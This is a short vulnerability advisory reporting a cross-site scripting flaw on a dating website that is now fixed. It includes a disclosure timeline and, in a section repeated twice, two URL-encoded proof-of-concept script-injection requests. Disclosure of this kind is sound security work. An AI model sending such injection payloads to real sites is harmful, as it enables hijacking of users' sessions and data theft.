SSCHADV2012-026 - www.parship.de - Cross-site Scripting vulnerability
Advisory:
|
www.parship.de – Cross-site Scripting vulnerability
|
Advisory ID:
|
SSCHADV2012-026
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on www.parship.de
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
http://www.parship.de is prone to a Cross-site Scripting vulnerability
======================
PoC-Exploit
======================
POST: http://www.parship.de/potw/answer%22%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(/huh/)%3C/script%3E
POST: http://www.parship.de/login/sendpassword/requestpassword%22%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(/huh/)%3C/script%3E
======================
Solution
======================
fixed
======================
Disclosure Timeline
======================
23-Dec-2012 – informed by contact form
24-Dec-2012 – feedback from vendor
05-Feb-2013 – feedback and fix from vendor
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.darksecurity.de/advisories/2012/SSCHADV2012-026.txt
PoC-Exploit
======================
POST: http://www.parship.de/potw/answer%22%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(/huh/)%3C/script%3E
POST: http://www.parship.de/login/sendpassword/requestpassword%22%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(/huh/)%3C/script%3E
======================
Solution
======================
fixed
======================
Disclosure Timeline
======================
23-Dec-2012 – informed by contact form
24-Dec-2012 – feedback from vendor
05-Feb-2013 – feedback and fix from vendor
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.darksecurity.de/advisories/2012/SSCHADV2012-026.txt
Comments
Display comments as Linear | Threaded